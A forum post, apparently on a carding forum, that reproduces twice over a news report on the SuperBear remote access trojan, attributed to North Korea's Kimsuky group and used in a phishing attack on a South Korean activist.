Carding
Professional
- Messages
- 2,870
- Reaction score
- 2,511
- Points
- 113
Researchers suspected the Kimsuky hacker group of using the new SuperBear Trojan.
A new phishing attack allegedly targeting civil society groups in South Korea has led to the discovery of a new SuperBear remote access Trojan by researchers at Interlabs.
Late last month, an unnamed South Korean civil rights activist received an email containing a malicious ".lnk"file label. The sender was listed as one of the members of the same activist organization, so the victim did not suspect anything.
The malicious shortcut, when executed, launched a PowerShell script to load other malicious components from a hacked but legitimate WordPress website. The payload included a script and an AutoIt binary file that used the Process Hollowing technique to inject malicious code into the process. Explorer.exe.
This whole chain of actions led to the installation of a previously unknown remote access malware called SuperBear on a compromised computer. Shortly after launch, it established communication with the attackers remote C2 server to exfiltrate data, download additional libraries, and execute commands.
According to Interlab researchers, by default, the Trojan always collects data from the infected host and sends it to the management server. But if hackers find something particularly interesting and valuable in the victim's files, they can continue the attack in manual mode, and extract even more useful data for themselves.
The malware was named SuperBear for a reason: researchers found this word in the code of a Trojan that can, under certain conditions, name one of its DLL libraries in this way.
The attack is attributed to the North Korean hacker group Kimsuky because of its similarity to its previous malware campaigns.
Experts note that Kimsuky is known for its numerous operations of data theft from government, military and commercial organizations. The group is linked to the North Korean government and probably conducts operations in its interests.
A new phishing attack allegedly targeting civil society groups in South Korea has led to the discovery of a new SuperBear remote access Trojan by researchers at Interlabs.
Late last month, an unnamed South Korean civil rights activist received an email containing a malicious ".lnk"file label. The sender was listed as one of the members of the same activist organization, so the victim did not suspect anything.
The malicious shortcut, when executed, launched a PowerShell script to load other malicious components from a hacked but legitimate WordPress website. The payload included a script and an AutoIt binary file that used the Process Hollowing technique to inject malicious code into the process. Explorer.exe.
This whole chain of actions led to the installation of a previously unknown remote access malware called SuperBear on a compromised computer. Shortly after launch, it established communication with the attackers remote C2 server to exfiltrate data, download additional libraries, and execute commands.
According to Interlab researchers, by default, the Trojan always collects data from the infected host and sends it to the management server. But if hackers find something particularly interesting and valuable in the victim's files, they can continue the attack in manual mode, and extract even more useful data for themselves.
The malware was named SuperBear for a reason: researchers found this word in the code of a Trojan that can, under certain conditions, name one of its DLL libraries in this way.
The attack is attributed to the North Korean hacker group Kimsuky because of its similarity to its previous malware campaigns.
Experts note that Kimsuky is known for its numerous operations of data theft from government, military and commercial organizations. The group is linked to the North Korean government and probably conducts operations in its interests.
